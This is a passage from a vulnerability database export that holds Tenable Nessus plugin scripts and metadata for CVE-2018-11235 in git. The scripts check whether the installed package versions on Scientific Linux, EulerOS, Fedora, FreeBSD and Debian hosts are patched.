script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", reference:\"emacs-git-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"emacs-git-el-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"git-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-all-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-bzr-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-cvs-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"git-daemon-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"git-debuginfo-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-email-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-gui-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-hg-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-p4-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"git-svn-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"gitk-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"gitweb-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"perl-Git-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"perl-Git-SVN-1.8.3.1-14.el7_5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / git / git-all / git-bzr / git-cvs / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:31:50", "description": "According to the version of the git packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-07-03T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : git (EulerOS-SA-2018-1215)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:git", "p-cpe:/a:huawei:euleros:perl-Git", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1215.NASL", "href": "https://www.tenable.com/plugins/nessus/110879", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110879);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2018-11235\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : git (EulerOS-SA-2018-1215)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the git packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - arbitrary code execution when recursively cloning a\n malicious repository (CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1215\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3303335f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"git-1.8.3.1-14.h2\",\n \"perl-Git-1.8.3.1-14.h2\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:29:05", "description": "Update to 0.26.4 (CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : libgit2 (2018-b10e54263a)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libgit2", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-B10E54263A.NASL", "href": "https://www.tenable.com/plugins/nessus/120715", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-b10e54263a.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120715);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-11235\");\n script_xref(name:\"FEDORA\", value:\"2018-b10e54263a\");\n\n script_name(english:\"Fedora 28 : libgit2 (2018-b10e54263a)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 0.26.4 (CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-b10e54263a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libgit2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libgit2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"libgit2-0.26.4-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:54:27", "description": "The Git community reports :\n\nInsufficient validation of submodule names", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-18T00:00:00", "type": "nessus", "title": "FreeBSD : Libgit2 -- Fixing insufficient validation of submodule names (5a1589ad-68f9-11e8-83f5-d8cb8abf62dd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:libgit2", "p-cpe:/a:freebsd:freebsd:py-pygit2", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_5A1589AD68F911E883F5D8CB8ABF62DD.NASL", "href": "https://www.tenable.com/plugins/nessus/110579", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110579);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2018-11235\");\n\n script_name(english:\"FreeBSD : Libgit2 -- Fixing insufficient validation of submodule names (5a1589ad-68f9-11e8-83f5-d8cb8abf62dd)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Git community reports :\n\nInsufficient validation of submodule names\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/libgit2/libgit2/releases/tag/v0.27.1\"\n );\n # https://vuxml.freebsd.org/freebsd/5a1589ad-68f9-11e8-83f5-d8cb8abf62dd.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1f4581ae\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:libgit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py-pygit2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"libgit2<0.27.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py-pygit2<0.27.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:54:00", "description": "Etienne Stalmans discovered that git, a fast, scalable, distributed revision control system, is prone to an arbitrary code execution vulnerability exploitable via specially crafted submodule names in a .gitmodules file.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-05-30T00:00:00", "type": "nessus", "title": "Debian DSA-4212-1 : git - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:git", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4212.NASL", "href": "https://www.tenable.com/plugins/nessus/110207", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4212. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110207);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/04/05 23:25:05\");\n\n script_cve_id(\"CVE-2018-11235\");\n script_xref(name:\"DSA\", value:\"4212\");\n\n script_name(english:\"Debian DSA-4212-1 : git - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Etienne Stalmans discovered that git, a fast, scalable, distributed\nrevision control system, is prone to an arbitrary code execution\nvulnerability exploitable via specially crafted submodule names in a\n.gitmodules file.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/git\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/git\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/git\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4212\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the git packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 1:2.1.4-2.1+deb8u6.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 1:2.11.0-3+deb9u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"git\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-all\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-arch\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-core\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-cvs\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-daemon-run\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-daemon-sysvinit\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-doc\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-el\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-email\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-gui\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-man\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-mediawiki\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-svn\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"gitk\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"gitweb\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-all\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-arch\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-core\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-cvs\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-daemon-run\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-daemon-sysvinit\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-doc\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-el\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-email\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-gui\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-man\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-mediawiki\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-svn\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"gitk\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"gitweb\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:54:34", "description": "An update for git is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact 